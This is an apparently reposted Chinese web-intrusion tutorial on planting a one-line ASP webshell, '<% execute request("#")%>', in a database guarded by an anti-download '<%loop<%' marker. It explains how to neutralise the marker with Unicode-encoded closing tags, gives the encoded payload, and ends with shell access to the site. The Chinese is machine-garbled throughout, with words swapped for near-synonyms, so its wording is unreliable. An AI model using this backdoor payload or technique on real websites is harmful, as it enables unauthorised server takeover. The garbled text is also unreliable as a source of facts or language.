|
|
|
联系客服020-83701501

突破数据库防下载

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
冲破数据库防下载

明天检测一web碰到个留言本默认数据库,拜访后涌现

Microsoft VBScript 编译器舛误 舛误 ‘800a040e’

‘loop’ 语句缺少 ‘do’

/data/data.asp,行 474

Default
1 loop <%^搜索了下,找到如下文章,规画了,记实下~

前几天搞了一个ART2008CMS的后台,


不绝没找到拿shell的门径。明天又下去看了看,创作发明备份文件名字应该也能用firebug批改,赶紧试试~


没标题,梗概畸形上传,但是不克不及把后缀jpg的木马直接备份asp,那只能从文章里插一句话了。

拔出一句话,备份,

打开一看,汗…… 表现‘loop’语句缺少‘do

去群里问了一下,是数据库中有防下载的<%loop<%才会多么。

下载数据库网上查教程,播种如下:

数据库中有一个NotDownload表,其内容表现为:”长二进制数据”

Loop是asp中的循环语句,其切实数据库中那一串长二进制数据就是<%loop<%的十六进制形式3C25206C6F6F70203C25.

我们梗概经由UltraEdit十六进制形式打开它,而后搜索<%就会创作发明如图

晓得asp语法的人看到这里应该都明确为什么会有 ‘loop’语句缺少‘do’ 的提示了把.所以当你拔出一句话的时候就会碰到脚本无法闭合的标题.此外<%loop<% 这种是无法闭合的.下面是关头思绪:既然无法闭合,我们是否可能表达掉?想到这里,我们就会想到单引号,没错就是它-ASP的表达符,但是前提是,要可能在他之前拔出一个<%’;x (这里的x梗概是此外字符,是为背面字符转换成unicode编码用的.) 此外,还要在<%loop<%背面拔出一个%>x(这里X也是同理)才具让其和背面拔出的闭合.多么即梗概表达掉<%loop<%这个弗成能闭合的标题了.我们整理一下思绪:就是在<%loop<%前后的合适位置拔出一段梗概闭合的代码,而且将在这2个闭合标识表记标帜两头的内容表达掉就便可。思绪有了..即梗概独霸了.此外阐明下,当你用UltraEdit十六进制形式打开数据库时搜索<%若是不是<%loop中的那个,就证明这里梗概拔出前置闭合符,同理,后置闭合符也梗概多么武断.承担察看,经由穷举法,多次测试前置闭合符和后置闭合符的拔出位置,找好位置后拔出一句话木马。

这里要留意的是在转换过程当中不克不及涌现?,这就是我方才为什么加一个x的起因了.
┼攠數畣整爠煥敵瑳∨∫┩愾┼砧

是经由lake2编写的a2u4hack.exe东西转换成Unicode编码,它原型是:<% execute request(“#”)%>a<%’x

再次UltraEdit十六进制形式打开搜索<%创作发明


“┠ 砾 “同理也是经由a2u4hack.exe东西编码的,它的原型是: %>x 多么当前提交即梗概提交到数据库而且美满的表达掉<%loop<%.
部分的责任实现后我们看下后果

得胜拔出一句话木马,也得胜链接了直接拿到WebShell.

本文摘自黑面小窝由网络安全攻防研究室(www.91ri.org) 网络动态安全小组收集整理.

数安新闻+更多

证书相关+更多